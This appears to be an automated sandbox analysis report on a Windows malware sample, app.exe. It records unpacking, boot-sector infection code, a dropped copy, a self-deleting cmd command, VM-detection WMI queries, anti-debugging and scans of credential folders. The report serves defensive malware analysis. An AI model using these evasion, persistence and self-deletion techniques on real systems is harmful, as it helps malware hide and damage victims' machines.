Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\timeout.exeSection loaded: edgegdi.dll
Source: C:\Users\user\Desktop\app.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: app.exeStatic file information: File size 1290240 > 1048576
Source: Binary string: SRLPR.pdBf source: app.exe, 00000003.00000003.3101475941.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3127769261.00000000055F6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: grabg::C:\\Users\\user\\Desktop\\GQSZOBXUFX\\RMDIWSRLPR.pdBfGbodyFUk1ESVdTU source: app.exe, 00000003.00000003.3101475941.00000000055E8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: GQSZOBXUFX\\RMDIWSRLPR.pdBfIbodyHUk1ESVdTU source: app.exe, 00000003.00000003.3127769261.00000000055F6000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
Detected unpacking (creates a PE file in dynamic memory)
Source: C:\Users\user\Desktop\app.exeUnpacked PE file: 0.2.app.exe.2560000.2.unpack
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeUnpacked PE file: 3.2.app.exe.2530000.2.unpack
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0042C59F VirtualAlloc,VirtualAlloc,LoadLibraryA,GetProcAddress,
Source: app.exeStatic PE information: section name: )m&
Source: app.exe.0.drStatic PE information: section name: )m&
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00416398 push eax; ret
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00415460 push eax; ret
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00415460 push eax; ret
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0047EC7F push FFFFFFA1h; retf
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00416F33 push ecx; ret
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025F23AD push es; iretd
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025EC6A1 push ecx; ret
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025F3881 push eax; ret
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025F691F push eax; ret
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_3_0552C6D7 push cs; iretd
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_3_055288A8 pushad ; iretd
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_3_05E6B3EB push ss; retf
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_3_05E6B3EB push ss; retf
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025C23AD push es; iretd
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025BC6A1 push ecx; ret
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025C3881 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025C691F push eax; ret

Persistence and Installation Behavior

barindex
Contains functionality to infect the boot sector
Source: C:\Users\user\Desktop\app.exeCode function: CreateFileA,CreateFileA,DeviceIoControl,CloseHandle,CloseHandle,CreateFileA,DeviceIoControl,CloseHandle,CloseHandle,CreateFileA,DeviceIoControl,DeviceIoControl,CloseHandle,CloseHandle,GetSystemDirectoryA,CopyFileA,CreateFileA,DeviceIoControl,CloseHandle,GetCurrentProcess,SetPriorityClass,GetCurrentDirectoryA,CreateFileA,FindResourceA,LoadResource,LockResource,SizeofResource,WriteFile,FreeResource,CloseHandle,CloseHandle,CreateFileA,DeleteFileA,DeviceIoControl,CloseHandle,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\Desktop\app.exeCode function: CreateFileA,CreateFileA,DeviceIoControl,CloseHandle,CloseHandle,CreateFileA,DeviceIoControl,CloseHandle,CloseHandle,CreateFileA,DeviceIoControl,DeviceIoControl,CloseHandle,CloseHandle,GetSystemDirectoryA,CopyFileA,CreateFileA,DeviceIoControl,CloseHandle,GetCurrentProcess,SetPriorityClass,GetCurrentDirectoryA,CreateFileA,FindResourceA,LoadResource,LockResource,SizeofResource,WriteFile,FreeResource,CloseHandle,CloseHandle,CreateFileA,DeleteFileA,DeviceIoControl,CloseHandle,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\Desktop\app.exeCode function: CreateFileA,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeJump to dropped file

Boot Survival

barindex
Contains functionality to infect the boot sector
Source: C:\Users\user\Desktop\app.exeCode function: CreateFileA,CreateFileA,DeviceIoControl,CloseHandle,CloseHandle,CreateFileA,DeviceIoControl,CloseHandle,CloseHandle,CreateFileA,DeviceIoControl,DeviceIoControl,CloseHandle,CloseHandle,GetSystemDirectoryA,CopyFileA,CreateFileA,DeviceIoControl,CloseHandle,GetCurrentProcess,SetPriorityClass,GetCurrentDirectoryA,CreateFileA,FindResourceA,LoadResource,LockResource,SizeofResource,WriteFile,FreeResource,CloseHandle,CloseHandle,CreateFileA,DeleteFileA,DeviceIoControl,CloseHandle,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\Desktop\app.exeCode function: CreateFileA,CreateFileA,DeviceIoControl,CloseHandle,CloseHandle,CreateFileA,DeviceIoControl,CloseHandle,CloseHandle,CreateFileA,DeviceIoControl,DeviceIoControl,CloseHandle,CloseHandle,GetSystemDirectoryA,CopyFileA,CreateFileA,DeviceIoControl,CloseHandle,GetCurrentProcess,SetPriorityClass,GetCurrentDirectoryA,CreateFileA,FindResourceA,LoadResource,LockResource,SizeofResource,WriteFile,FreeResource,CloseHandle,CloseHandle,CreateFileA,DeleteFileA,DeviceIoControl,CloseHandle,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\Desktop\app.exeCode function: CreateFileA,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d

Hooking and other Techniques for Hiding and Protection

barindex
Self deletion via cmd or bat file
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeProcess created: cmd.exe /c timeout /t 5 & del /f /q C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe && exit
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeProcess created: cmd.exe /c timeout /t 5 & del /f /q C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe && exit
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00401660 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0040CFF1 IsIconic,GetWindowPlacement,GetWindowRect,
Source: C:\Users\user\Desktop\app.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\app.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Queries memory information (via WMI often done to detect virtual machines)
Source: C:\Users\user\Desktop\app.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_Memory
Source: C:\Users\user\Desktop\app.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_SMBIOSMemory
Source: C:\Users\user\Desktop\app.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_MemoryArray
Source: C:\Users\user\Desktop\app.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_MemoryDevice
Source: C:\Users\user\Desktop\app.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
Source: C:\Users\user\Desktop\app.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_CacheMemory
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_Memory
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_SMBIOSMemory
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_MemoryArray
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_MemoryDevice
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_CacheMemory
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Source: C:\Users\user\Desktop\app.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00408FF2 rdtsc
Source: C:\Users\user\Desktop\app.exeCode function: LoadLibraryA,FreeLibrary,GetAdaptersInfo,GetAdaptersInfo,
Source: C:\Users\user\Desktop\app.exeAPI coverage: 2.6 %
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeAPI coverage: 8.1 %
Source: C:\Users\user\Desktop\app.exe TID: 1440Thread sleep count: 53 > 30
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe TID: 6904Thread sleep count: 68 > 30
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe TID: 1588Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 1928Thread sleep count: 39 > 30
Source: C:\Users\user\Desktop\app.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
Source: C:\Users\user\Desktop\app.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Processor
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00427361 GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA,
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025CA710 CloseHandle,FindFirstFileW,FindClose,HeapFree,HeapFree,HeapFree,
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025E4B93 FindFirstFileExW,
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0259A710 CloseHandle,FindFirstFileW,FindClose,HeapFree,HeapFree,HeapFree,
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0259FEC0 HeapFree,HeapFree,HeapFree,HeapFree,FindFirstFileW,HeapFree,HeapFree,GetLastError,HeapFree,HeapFree,
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025B4B93 FindFirstFileExW,
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0041E91D VirtualQuery,GetSystemInfo,VirtualQuery,VirtualAlloc,VirtualProtect,
Source: app.exe, 00000003.00000003.3112020011.0000000000956000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3123955917.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3107954475.0000000000956000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3092789933.0000000000956000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3121520475.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3121520475.0000000000956000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3116384116.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3123955917.0000000000956000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3098259663.0000000000956000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3126108218.0000000000956000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3099980672.0000000000956000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: app.exe, 00000003.00000002.3294569055.00000000008CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeProcess information queried: ProcessInformation
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00408FF2 rdtsc
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025E44E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0042C59F VirtualAlloc,VirtualAlloc,LoadLibraryA,GetProcAddress,
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025CD430 GetProcessHeap,RtlAllocateHeap,
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0041B198 SetUnhandledExceptionFilter,
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0041B1AC SetUnhandledExceptionFilter,
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0256EAC0 RtlAddVectoredExceptionHandler,SetThreadStackGuarantee,GetLastError,HeapFree,HeapFree,
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025DE0C8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025E44E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0253EAC0 RtlAddVectoredExceptionHandler,SetThreadStackGuarantee,GetLastError,HeapFree,HeapFree,
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025AE0C8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025B44E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025ADC6E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025ADDCA SetUnhandledExceptionFilter,
Source: C:\Users\user\Desktop\app.exeMemory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\app.exeProcess created: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe "C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 5
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00409127 cpuid
Source: C:\Users\user\Desktop\app.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,
Source: C:\Users\user\Desktop\app.exeCode function: GetLocaleInfoA,
Source: C:\Users\user\Desktop\app.exeCode function: lstrcpyA,wsprintfA,LoadLibraryA,GetLocaleInfoA,
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\.curlrc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\.curlrc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\3D Objects VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\3D Objects\desktop.ini VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\3D Objects\desktop.ini VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\.curlrc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\.curlrc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Adobe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Comms VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\D3DSCache VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\ElevatedDiagnostics VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Google VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\History VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\IconCache.db VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\IconCache.db VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Intel VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\MicrosoftEdge VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Mozilla VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Packages VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\PeerDistRepub VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Publishers VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\VirtualStore VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\_curlrc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\_curlrc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\LocalLow VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\LocalLow\Adobe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\LocalLow\Intel VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\LocalLow\Microsoft VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\LocalLow\Mozilla VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Roaming VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Roaming\.curlrc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Roaming\.curlrc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Roaming\Sun VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Roaming\_curlrc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Roaming\_curlrc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Roaming VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Roaming\.curlrc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Roaming\.curlrc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Roaming\Adobe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Roaming\Adobe\Acrobat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Roaming\Adobe\Flash Player VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Roaming\Adobe\Headlights VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Roaming\Adobe\Linguistics VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Roaming\Adobe\LogTransport2 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\AddIns VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Credentials VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Excel VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\MMC VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Network VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Protect VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Vault VolumeInformation
